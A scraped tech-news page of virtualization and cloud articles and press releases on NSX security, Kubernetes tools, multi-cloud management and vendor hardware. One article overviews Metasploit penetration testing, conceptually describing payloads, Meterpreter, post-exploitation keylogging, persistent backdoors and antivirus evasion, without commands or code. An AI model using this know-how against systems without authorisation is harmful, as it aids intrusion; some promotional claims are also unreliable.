Use Microsoft Azure Virtual Machines to run large-scale parallel MATLAB workloads

MATLAB® is a hugely popular platform used by engineers and scientists to analyze and design systems and products. Users with large-scale simulations and data analytics tasks can use MathWorks parallel computing products to speed up and scale these workloads by taking advantage of multi-core processors, GPU acceleration as well as compute clusters. To create clusters, MATLAB Distributed Computing Server™ is used on the cluster nodes and includes a built-in job scheduler that supports batch jobs, parallel computations and distributed large data.

Spotlight

Wavefront® by VMware

Wavefront is the ultimate metrics monitoring service for cloud and modern application environments. Its observability and analytics tools enable DevOps functions at SaaS companies where power, scale, performance, and reliability are essential to their business.

OTHER ARTICLES
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | April 28, 2023

Contents 1. Overview 2. Ethical Hacking and Penetration Testing 3. Metasploit Penetration Test 4. Why Choose Metasploit Framework for your Business? 5. Closing remarks 1. Overview Metasploitable refers to an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best penetration testing frameworks that helps businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit as a penetration testing system and a development platform that allows the creation of security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options. 2. Ethical Hacking and Penetration Testing An ethical hacker is one who works within a security framework and checks for bugs that a malicious hacker might use to exploit networks. They use their experience and skills to render the cyber environment. To protect the infrastructure from the threat that hackers pose, ethical hacking is essential. The main purpose of an ethical hacking service is to report and assess the safety of the targeted systems and networks for the owner. Ethical hacking is performed with penetration test techniques to evaluate security loopholes. There are many techniques used to hack information, such as – Information gathering Vulnerability scanning Exploitation Test analysis Ethical hacking involves automatic methods. The hacking process without automated software is inefficient and time-consuming. There are several tools and methods that can be used for ethical hacking and penetration testing. The Metasploit framework eases the effort to exploit vulnerabilities in networks, operating systems, and applications and generates new exploits for new or unknown vulnerabilities. 3. Metasploit Penetration Test Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system. Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration. Exploitation: The payload gets executed at the target if the exploit, a tool used to take advantage of system weakness, is successful, and the user gets a shell for interacting with the payload (a shellcode is a small piece of code used as the payload).The most popular payload, a set of malicious codes to attack Windows systems, is Meterpreter, an in-memory-only interactive shell. (Meterpreter is a Metasploit attack payload that provides an interactive shell for the attacker to explore the target machine and execute code.)Other payloads are: Static payloads (it enables port forwarding and communications between networks) Dynamic payloads (to evade antivirus software, it allows testers to generate unique payloads) Command shell payloads (enables users to run scripts or commands against a host) Post-Exploitation: Metasploit offers various exploitation tools for privilege escalation, packet sniffing, keyloggers, screen capture, and pivoting tools once on the target machine. Resolution and Re-Testing: Users set up a persistent backdoor if the target machine gets rebooted. These available features in Metasploit make it easy to configure as per the user's requirements. 4. Why Choose Metasploit Framework for your Business? Significant advantages of the Metasploit Framework are discussed below: Open-source: Metasploit Framework is actively developed as open-source software, so most companies prefer this to grow their businesses. Easy usage: It is very easy to use, defining an easy-naming conversation with the commands. This also facilitates the building of an extensive penetration test of the network. GUI Environment: It mainly provides third-party instances that are friendly. These interfaces ease the penetration testing projects by providing the facilities with services such as button clicks, over-the-fly vulnerability management, and easy-to-shift workspaces, among others. Cleaner Exits: Metasploit can cleanly exit without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system. Easy Switching Between Payloads: Metasploit allows testers to change payloads with the 'setpayload' command easily. It offers flexibility for system penetration through shell-based access or meterpreter. 5. Closing remarks From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or GUI. Metasploitable is a vulnerable virtual machine ideally used for ethical hacking and penetration testing, in VM security. One trend likely to impact the future of Metasploitable is the increasing use of cloud-based environments for testing and production. It is possible that Metasploitable could be adapted to work in cloud environments or that new tools will be developed specifically for cloud-based penetration testing. Another trend that may impact the future of Metasploitable is the growing importance of automation in security testing. Thus, Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape continues to evolve, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More
Server Hypervisors

VMware NSX 3.2 Delivers New, Advanced Security Capabilities

Article | September 9, 2022

It’s an impactful release focused on significant NSX Security enhancements Putting a hard shell around a soft core is not a recipe for success in security, but somehow legacy security architectures for application protection have often looked exactly like that: a hard perimeter firewall layer for an application infrastructure that was fundamentally not built with security as a primary concern. VMware NSX Distributed Firewall pioneered the micro-segmentation concept for granular access controls for cloud applications with the initial launch of the product in 2013. The promise of Zero Trust security for applications, the simplicity of deployment of the solution, and the ease of achieving internal security objectives made NSX an instant success for security-sensitive customers. Our newest release — NSX-T 3.2 — establishes a new marker for securing application infrastructure by introducing significant new features to identify and respond to malware and ransomware attacks in the network, to enhance user identification and L7 application identification capabilities, and, at the same time, to simplify deployment of the product for our customers. Modern day security teams need to secure mission-critical infrastructure from both external and internal attacks. By providing unprecedented threat visibility leveraging IDS, NTA, and Network Detection and Response (NDR) capabilities along with granular controls leveraging L4-L7 Firewall, IPS, and Malware Prevention capabilities, NSX 3.2 delivers an incredible security solution for our customers“ Umesh Mahajan, SVP, GM (Networking and Security Business Unit) Distributed Advanced Threat Prevention (ATP) Attackers often use multiple sophisticated techniques to penetrate the network, move laterally within the network in a stealthy manner, and exfiltrate critical data at an appropriate time. Micro-segmentation solutions focused solely on access control can reduce the attack surface — but cannot provide the detection and prevention technologies needed to thwart modern attacks. NSX-T 3.2 introduces several new capabilities focused on detection and prevention of attacks inside the network. Of critical note is that these advanced security solutions do not need network taps, separate monitoring networks, or agents inside each and every workload. Distributed Malware Prevention Lastline’s highly reputed dynamic malware technology is now integrated with NSX Distributed Firewall to deliver an industry-first Distributed Malware Prevention solution. Leveraging the integration with Lastline, a Distributed Firewall embedded within the hypervisor kernel can now identify both “known malicious” as well as “zero day” malware Distributed Behavioral IDS Whereas earlier versions of NSX Distributed IDPS (Intrusion Detection and Prevention System) delivered primarily signature-based detection of intrusions, NSX 3.2 introduces “behavioral” intrusion detection capabilities as well. Even if specific IDS signatures are not triggered, this capability helps customers know whether a workload is seeing any behavioral anomalies, like DNS tunneling or beaconing, for example, that could be a cause for concern. Network Traffic Analysis (NTA) For customers interested in baselining network-wide behavior and identifying anomalous behavior at the aggregated network level, NSX-T 3.2 introduces Distributed Network Traffic Analysis (NTA). Network-wide anomalies like lateral movement, suspicious RDP traffic, and malicious interactions with the Active Directory server, for example, can alert security teams about attacks underway and help them take quick remediation actions. Network Detection and Response (NDR) Alert overload, and resulting fatigue, is a real challenge among security teams. Leveraging advanced AI/ML techniques, the NSX-T 3.2 Network Detection and Response solution consolidates security IOCs from different detection systems like IDS, NTA, malware detection. etc., to provide a ”campaign view” that shows specific attacks in play at that point in time. MITRE ATT&CK visualization helps customers see the specific stage in the kill chain of individual attacks, and the ”time sequence” view helps understand the sequence of events that contributed to the attack on the network. Key Firewall Enhancements While delivering new Advanced Threat Prevention capabilities is one key emphasis for the NSX-T 3.2 release, providing meaningful enhancements for core firewalling capabilities is an equally critical area of innovation. Distributed Firewall for VDS Switchports While NSX-T has thus far supported workloads connected to both overlay-based N-VDS switchports as well as VLAN-based switchports, customers had to move the VLAN switchports from VDS to N-VDS before a Distributed Firewall could be enforced. With NSX-T 3.2, native VLAN DVPGs are supported as-is, without having to move to N-VDS. Effectively, Distributed Security can be achieved in a completely seamless manner without having to modify any networking constructs. Distributed Firewall workflows in vCenter With NSX-T 3.2, we are introducing the ability to create and modify Distributed Firewall rules natively within vCenter. For small- to medium-sized VMware customers, this feature simplifies the user experience by eliminating the need to leverage a separate NSX Manager interface. Advanced User Identification for Distributed and Gateway Firewalls NSX supported user identity-based access control in earlier releases. With NSX-T 3.2, we’re introducing the ability to directly connect to Microsoft Active Directory to support user identity mapping. In addition, for customers who do not use Active Directory for user authentication, NSX also supports VMware vRealize LogInsight as an additional method to carry out user identity mapping. This feature enhancement is applicable for both NSX Distributed Firewall as well as NSX Gateway Firewall. Enhanced L7 Application Identification for Distributed and Gateway Firewalls NSX supported Layer-7 application identification-based access control in earlier releases. With NSX-T 3.2, we are enhancing the signature set to about 750 applications. While several perimeter firewall vendors claim a larger set of Layer-7 application signatures, they focus mostly on internet application identification (like Facebook, for example). Our focus with NSX at this time is on internal applications hosted by enterprises. This feature enhancement is applicable for both NSX Distributed Firewall as well as Gateway Firewalls. NSX Intelligence NSX Intelligence is geared towards delivering unprecedented visibility for all application traffic inside the network and enabling customers to create micro-segmentation policies to reduce the attack surface. It has a processing pipeline that de-dups, aggregates, and correlates East-West traffic to deliver in-depth visibility. Scalability enhancements for NSX Intelligence As application infrastructure grows rapidly, it is vital that one’s security analytics platform can grow with it. With the new release, we have rearchitected the application platform upon which NSX Intelligence runs — moving from a stand-alone appliance to a containerized micro-service architecture powered by Kubernetes. This architectural change future-proofs the Intelligence data lake and allows us to eventually scale out our solution to n-node Kubernetes clusters. Large Enterprise customers that need visibility for application traffic can confidently deploy NSX Intelligence and leverage the enhanced scale it supports. NSX Gateway Firewall While NSX Distributed Firewall focuses on east-west controls within the network, NSX Gateway Firewall is used for securing ingress and egress traffic into and out of a zone. Gateway Firewall Malware Detection NSX Gateway Firewall in the 3.2 release received significant Advanced Threat Detection capabilities. Gateway Firewall can now identify both known as well as zero-day malware ingressing or egressing the network. This new capability is based on the Gateway Firewall integration with Lastline’s highly reputed dynamic network sandbox technology. Gateway Firewall URL Filtering Internal users and applications reaching out to malicious websites is a huge security risk that must be addressed. In addition, enterprises need to limit internet access to comply with corporate internet usage policies. NSX Gateway Firewall in 3.2 introduces the capability to restrict access to internet sites. Access can be limited based on either the category the URL belongs to, or the “reputation” of the URL. The URL to category and reputation mapping is constantly updated by VMware so customer intent is enforced automatically even after many changes in the internet sites themselves.

Read More
VMware, Vsphere, Hyper-V

Boosting Productivity with Kubernetes and Docker

Article | May 2, 2023

Learn setting up a Docker and Kubernetes environment with the right considerations and choose the best-suited software from ten leading tools, softwares and platforms for your business needs. Contents The blog discusses how Kubernetes and Docker can boost software development and deployment productivity. In addition, it covers the benefits of the role of Kubernetes in orchestrating containerized applications and best practices for implementing these technologies to improve efficiency and streamline workflows. Docker and Kubernetes are both essential containerization ecosystem utilities. Kubernetes, an excellent DevOps solution, manages and automates containers' deployment and scaling, along with operating across clusters of hosts, whereas Docker is used for creating and operating containers. The blog covers tips to consider while choosing tools/platforms. It further enlists ten platforms providing Kubernetes and Docker, featuring their offerings. 1. Considerations While Setting Up a Development Environment with Kubernetes and Docker 1.1 Fluid app delivery A platform for application development must provide development teams with high velocity. Two factors contribute to high velocity: rapid application delivery and brief development cycles. Application platforms must support build processes that start with source code. The platforms must also facilitate the repetitive deployment of applications on any remote staging instance. 1.2 Polyglot support Consistency is the defining characteristic of an application platform. On-demand, repetitive, and reproducible builds must be supported by the platform. Extending a consistent experience across all languages and frameworks elevates the platform experience. The platform must support a native build process and the ability to develop and customize this build process. 1.3 Baked-in security Containerized environments are secured in a significantly different manner than conventional applications. A fundamental best practice is to utilize binaries compiled with all necessary dependencies. The build procedure should also include a directive to eliminate unnecessary components for the application's operation. Setting up a zero-trust architecture between platform components that orchestrate deployments significantly improves the workloads' security posture. 1.4 Adjustable abstractions A platform with paved paths and the flexibility to accommodate the requirements of software engineering teams has a greater chance of success. Open-source platforms score highly in this regard, particularly those with modular architectures that allow the team to swap out parts as they adjust. 2.Top Tips to Consider While Choosing Tools and Platforms for Kubernetes and Docker 2.1 Production-Readiness Configuring Kubernetes or Docker can be complex and resource-intensive. A production-ready platform will ensure having the necessary fully automated features without the need for configuration. Security is an essential aspect of production readiness. Additionally, automation is critical, as production readiness requires that the solution manage all cluster management duties. Automated backup, recovery, and restore capabilities must be considered. Also, ensure the high availability, scalability, and self-healing of the cluster's platform. 2.2 Future-Readiness As the cloud and software evolve, a system's hosting location may affect its efficacy. The current trend is a multi-cloud strategy. Ensure that the platform can support abstracting from cloud or data center providers and building a shared infrastructure across clouds, cloud regions, and data centers, as well as assist in configuring them if required. According to a recent study, nearly one-third of organizations are already collaborating with four or more cloud service providers. (Source: Microsoft and 451 Research) 2.3 Ease of Administration Managing a Docker or Kubernetes cluster is complex and requires various skill sets. Kubernetes generates a lot of unprocessed data, which must be interpreted to comprehend what's happening with the cluster. Early detection and intervention are crucial to disaster prevention. Identifying a platform that eliminates the issue of analyzing raw data is essential. By incorporating automated intelligent monitoring and alerts, such solutions can provide critical status, error, event, and warning data to take appropriate action. 2.4 Assistance and Training As the organization begins to acquire Kubernetesor Docker skills, it is essential to have a vendor that can provide 24/7 support and training to ensure a seamless transition. Incorrect implementation will add a layer of complexity to infrastructure management. Leverage automation tools that offer the support needed to use Kubernetes and Docker without the management burden. 3. 10 Tools and Platforms Providing Kubernetes and Docker 3.1 Aqua Cloud Native Security Platform: Aqua Security provides the Aqua Cloud Native Security Platform, a comprehensive security solution designed to protect cloud-native applications and microservices. Aqua offers end-to-end security for applications operating on Docker Enterprise Edition (Community Edition), protecting the DevOps pipeline and production workloads with complete visibility and control. It provides end-to-end security across the entire application lifecycle, from development to production, for both containerized and serverless workloads. In addition, it automates prevention, detection, and response across the whole application lifecycle to secure the build, cloud infrastructure, and operating workloads, regardless of where they are deployed. 3.2 Weave Gitops Enterprise Weave GitOps Enterprise, a full-stack, developer-centric operating model for Kubernetes, creates and contributes to several open-source projects. Its products and services enable teams to design, build, and operate their Kubernetes platform at scale. Built by the creators of Flux and Flagger, Weave GitOps allows users to deploy and manage Kubernetes clusters and applications in the public or private cloud or their own data center. Weave GitOps Enterprise helps simplify Kubernetes with fully automated continuous delivery pipelines that roll out changes from development to staging and production. Weaveworks has used Kubernetes in production for over eight years and has developed that expertise into Weave GitOps Enterprise. 3.3 Mirantis Kubernetes Engine Mirantis provides the Mirantis Kubernetes Engine, a platform designed to help organizations deploy, manage, and scale their Kubernetes clusters. It includes features such as container orchestration, automated deployment, monitoring, and high availability, all designed to help organizations build and run their applications at scale. Mirantis Kubernetes Engine also includes a set of tools for managing the lifecycle of Kubernetes clusters, including cluster deployment, upgrades, and patching. It also has security scanning and policy enforcement features, as well as integration with other enterprise IT systems such as Active Directory and LDAP. 3.4 Portworx by Pure Storage Portworx's deep integration into Docker gives Portworx container data services benefits directly through the Docker Swarm scheduler. Swarm service creation brings the management capability of Portworx to the Docker persistent storage layer to avoid complex tasks such as increasing the storage pool without container downtime and problems like stuck EBS drives. Portworx is also a multi-cloud-ready Kubernetes storage and administration platform designed to simplify and streamline data management in Kubernetes. The platform abstracts the complexity of data storage in Kubernetes. Additionally, it serves as a software-defined layer that aggregates Kubernetes nodes' data storage into a virtual reservoir. 3.5 Platform9 Platform9 provides a powerful IDE for developers for simplified in-context views of pods, logs, events, and more. Both development and operations teams can access the information they need in an instant, secured through SSO and Kubernetes RBAC. The industry’s first SaaS-managed approach combined with a best-in-class support and customer success organization with a 99.9% consistent CSAT rating delivers production-ready K8s to organizations of any size. It provides services to deploy a cluster instantly, achieve GitOps faster, and take care of every aspect of cluster management, including remote monitoring, self-healing, automatic troubleshooting, and proactive issue resolution, around the clock. 3.6 Kubernetes Network Security Sysdig provides Kubernetes Network Security, a solution that offers cloud security from source to run. The product provides network security for Kubernetes environments by monitoring and blocking suspicious traffic in real time. It helps organizations protect their Kubernetes clusters against advanced threats and attacks. The product and Sysdig Secure offer Kubernetes Network Monitoring to investigate suspicious traffic and connection attempts, Kubernetes-Native Microsegmentation to enable microsegmentation without breaking the application, and Automated Network Policies to save time by automating Kubernetes network policies. 3.7 Kubernetes Operations Platform for Edge Rafay delivers a production-ready Kubernetes Operations Platform for Edge, streamlining ongoing operations for edge applications. It provides centralized multi-cluster management to deploy, manage, and upgrade all Kubernetes clusters from a single console across all edge nodes. In addition, it offers comprehensive lifecycle management, with which users can quickly and easily provision Kubernetes clusters at the edge, where cluster updates and upgrades are seamless with no downtime. Furthermore, the KMC for Edge quickly integrates with enterprise-class SSO solutions such as Okta, Ping One, and Azure AD, among others. Other features include standardized clusters and workflows, integration and automation, and centralized logging and monitoring. 3.8 Opcito Technologies Opcito provides simplified container management with efficient provisioning, deployment, scaling, and networking. Its application containerization expertise helps containerize existing and new applications and dependencies. Opcito is well-versed in leading container orchestration platforms like Docker Swarm and Kubernetes. While it helps choose the container platform that best suits specific application needs, it also helps with the end-to-end management of containers so clients can release applications faster and focus on innovation and business. The container management and orchestration services include: building secured microservices, Enterprise-scale Container Management and Orchestration, Orchestration, and Container Monitoring. 3.9 D2iQ Kubernetes Platform (DKP) D2iQ (DKP) enables enterprises to take advantage of all the benefits of cloud-native Kubernetes while laying the groundwork for intelligent cloud-native innovation by simplifying Kubernetes deployment and maintenance. It simplifies and automates the most difficult parts of an enterprise Kubernetes deployment across all infrastructures. DKP helps enterprises easily overcome operational barriers and set them up in minutes and hours rather than weeks and months. In addition, DKP simplifies Kubernetes management through automation using GitOps workflow, observability, application catalog, real-time cost management, and more. 3.10 Spektra Spektra, by Diamanti, a multi-cluster management solution for DevOps and production teams, provides centralized multi-cluster management, a single control plane to deliver everything needed to provision and manage the lifecycle of multiple clusters. Spektra is built to cater to business needs, from air-gapped on-prem deployments to hybrid and multi-cloud infrastructures. It also enables stretching resources across different clusters within the tenant. Furthermore, it allows you to move workloads and their associated data from one cluster to another directly from its dashboard. Spektra integrates with lightweight directory access protocols (LDAP) and Active Directory (AD) to enable user authentication and streamline resource access. In addition, it offers application migration, data mobility, and reporting. 4. Conclusion It is evident that Kubernetes and Docker can significantly boost software development and deployment productivity. By adopting appropriate containerization platforms and leveraging Kubernetes for orchestration, organizations can streamline workflows, improve efficiency, and enhance the reliability of their applications. Furthermore, following the tips to choose the tools or platform carefully can further improve productivity.

Read More
Virtual Desktop Tools

Managing Multi-Cloud Complexities for a Seamless Experience

Article | July 7, 2022

Introduction The early 2000s were milestone moments for the cloud. Amazon Web Services (AWS) entered the market in 2006, while Google revealed its first cloud service in 2007. Fast forward to 2020, when the pandemic boosted digital transformation efforts by around seven years (according to McKinsey), and the cloud has become a commercial necessity today. It not only facilitated the swift transition to remote work, but it also remains critical in maintaining company sustainability and creativity. Many can argue that the large-scale transition to the cloud in the 2010s was necessary to enable the digital-first experiences that remote workers and decentralized businesses need today. Multi-cloud and hybrid cloud setups are now the norm. According to Gartner, most businesses today use a multi-cloud approach to reduce vendor lock-in or to take advantage of more flexible, best-of-breed solutions. However, managing multi-cloud systems increases cloud complexity, and IT concerns, frequently slowing rather than accelerating innovation. According to 2022 research done by IntelligentCIO, the average multi-cloud system includes five platforms, including AWS, Microsoft Azure, Google Cloud, and IBM Red Hat, among others. Managing Multi-Cloud Complexities Like a Pro Your multi-cloud strategy should satisfy your company's requirements while also laying the groundwork for managing various cloud deployments. Creating a proactive plan for managing multi-cloud setups is one of the finest features that can distinguish your company. The five strategies for handling multi-cloud complexity are outlined below. Managing Data with AI and ML AI and machine learning can help manage enormous quantities of data in multi-cloud environments. AI simulates human decision-making and performs tasks as well as humans or even better at times. Machine learning is a type of artificial intelligence that learns from data, recognizes patterns, and makes decisions with minimum human interaction. AI and ML to help discover the most important data, reducing big data and multi-cloud complexity. AI and machine learning enable more simplicity and better data control. Integrated Management Structure Keeping up with the growing number of cloud services from several providers requires a unified management structure. Multiple cloud management requires IT time, resources, and technology to juggle and correlate infrastructure alternatives. Routinely monitor your cloud resources and service settings. It's important to manage apps, clouds, and people globally. Ensure you have the technology and infrastructure to handle several clouds. Developing Security Strategy Operating multiple clouds requires a security strategy and seamless integration of security capabilities. There's no single right answer since vendors have varied policies and cybersecurity methods. Storing data on many cloud deployments prevents data loss. Handling backups and safety copies of your data are crucial. Regularly examine your multi-cloud network's security. The cyber threat environment will vary as infrastructure and software do. Multi-cloud strategies must safeguard data and applications. Skillset Management Multi-cloud complexity requires skilled operators. Do you have the appropriate IT personnel to handle multi-cloud? If not, can you use managed or cloud services? These individuals or people are in charge of teaching the organization about how each cloud deployment helps the company accomplish its goals. This specialist ensures all cloud entities work properly by utilizing cloud technologies. Closing Lines Traditional cloud monitoring solutions are incapable of dealing with dynamic multi-cloud setups, but automated intelligence is the best at getting to the heart of cloud performance and security concerns. To begin with, businesses require end-to-end observability in order to see the overall picture. Add automation and causal AI to this capacity, and teams can obtain the accurate answers they require to better optimize their environments, freeing them up to concentrate on increasing innovation and generating better business results.

Read More

Spotlight

Wavefront® by VMware

Wavefront is the ultimate metrics monitoring service for cloud and modern application environments. Its observability and analytics tools enable DevOps functions at SaaS companies where power, scale, performance, and reliability are essential to their business.

Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Server Virtualization

Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements. As vehicles become more software reliant, vehicle systems must support the extended software lifecycle by enabling software upgrades and prolonging the supporting hardware capability. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high-performance and heavy data input processing capability. Importantly, the design is upgradeable, scalable and future-proof across today's evolving in-vehicle platforms. Neuron HPC Architecture & Design Panasonic Automotive's High Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%1 – allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform including internal combustion engine, hybrid, fuel cell or electric vehicles. "In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. "Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs." Key Systems, UX Features & Technical Benefits With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features. About Panasonic Automotive Systems Company of America  Panasonic Automotive Systems Company of America is a division company of Panasonic Corporation of North America and is a leading global supplier of automotive infotainment and connectivity system solutions. Panasonic Automotive Systems Company of America acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates global automotive. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing and engineering operations in Farmington Hills, Mich. About Panasonic Corporation of North America Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.

Read More

Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate and integrate into the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains. Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy." Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken. The foundation for true cross-chain interoperability is being built as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, allowing aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas, while also establishing state transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains. Through this partnership, aelf blockchain's capabilities will be enhanced as it is able to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will now be empowered to build on aelf blockchain. This partnership will also foster increased engagement within the Web3 community as users can gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains. About aelf aelf, a high-performance Layer 1 featuring multi-sidechain technology for unlimited scalability. aelf blockchain is designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS, aelf's variation of a Delegated Proof-of-Stake (DPoS) consensus protocol; parallel processing; peer-to-peer (P2P) network communication; cross-chain bridges, and a dynamic side chain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates the building, integrating, and deploying of smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network. aelf is committed to fostering innovation within its ecosystem and remains dedicated to driving the development of Web3 and the adoption of blockchain technology. About ChainsAtlas ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.

Read More

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP with enhanced video processing performance to strengthen its presence in the data center applications. The newly launched series IP caters to the advanced requirements of next generation data centers including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming. The VC9800 series of VPU IP boasts high performance, high throughput, and server-level multi-stream encoding and decoding capabilities. It can handle up to 256 streams and support all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series IP improves video quality significantly with low memory footprint and encoding latency. With capable of supporting 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, thus achieves an efficient transcoding solution. The VC9800 series of VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. When combined with VeriSilicon’s Graphics Processor Unit (GPU) IP, the subsystem solution is able to deliver enhanced gaming experiences. In addition, the hardware virtualization, super resolution image enhancement, and AI-enabled encoding functions of this series IP also offer effective solutions for virtual cloud desktops. “VeriSilicon’s advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers,” said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. “For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We’ve also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display.” About VeriSilicon VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Server Virtualization

